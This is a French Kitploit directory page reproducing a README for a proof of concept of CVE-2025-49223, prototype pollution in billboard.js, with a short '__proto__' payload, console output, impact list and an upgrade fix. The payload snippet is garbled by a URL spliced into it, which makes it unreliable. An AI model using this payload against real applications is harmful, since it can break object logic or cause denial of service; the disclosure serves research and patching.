Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49223-BillboardJS-PoC — Preuve de concept pour CVE-2025-49223 démontrant la pollution de prototype dans billboard.js via la fonction generate, permettant l'exécution de code arbitraire ou le déni de service. | Kitploit
Outils/GitHubGitHub/louay-075/cve-2025-49223-billboardjs-poc
Analyse des VulnérabilitésExploitationSécurité WebArticles et RechercheApprentissage et Éducation
GitHublouay-075/cve-2025-49223-billboardjs-poc

CVE-2025-49223-BillboardJS-PoC

Preuve de concept pour CVE-2025-49223 démontrant la pollution de prototype dans billboard.js via la fonction generate, permettant l'exécution de code arbitraire ou le déni de service.

Voir le dépôt
111il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

💥 CVE-2025-49223 - Pollution de prototype dans Billboard.js

Il a été découvert que billboard.js avant la version 3.15.1 contient une pollution de prototype via la fonction generate, ce qui pourrait permettre à des attaquants d'exécuter du code arbitraire ou de provoquer un déni de service (DoS) en injectant des propriétés arbitraires.

Ce dépôt démontre une vulnérabilité de pollution de prototype trouvée dans billboard.js versions antérieures à 3.15.1, divulguée sous le nom CVE-2025-49223.


📌 Résumé

  • Type de vulnérabilité: Pollution de prototype
  • Bibliothèque affectée: billboard.js
  • Versions affectées: <= 3.14.0
  • Version corrigée: >= 3.15.1
  • Identifiant CVE: CVE-2025-49223
  • Impact: exécution de code arbitraire ou déni de service

🧪 Preuve de concept (PoC)

Ouvrez index.html dans un navigateur et vérifiez la console pour les tentatives de pollution de prototype.

Charger la version vulnérable :

root@kitploit:~
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>

Tentative de pollution :

root@kitploit:~
{
  ["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/main/%7B
    polluted: "polluted_via_string_key"
  }
}

Sortie console :

root@kitploit:~
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key

Cela confirme qu'un attaquant peut polluer Object.prototype, impactant tout objet futur créé sur la page.


🔥 Impact

Une exploitation réussie peut entraîner :

  • Injection de clés arbitraires dans tous les objets
  • Altération de la logique de rendu des graphiques
  • Plantages d'application (DoS)
  • Potentiel de contournement de sécurité dans les applications reposant sur un merge d'objets non sécurisé


🛡️ Atténuation

  • ✅ Mettez à jour vers billboard.js version 3.15.1 ou ultérieure

🧱 Références

  • 🔗 CVE-2025-49223 on NVD
  • 🔗 Billboard.js 3.15.1 Release Notes


⚠️ Avertissement : Cette preuve de concept est destinée uniquement à des fins éducatives et de recherche. Utilisez-la de manière responsable.

Télécharger l’outil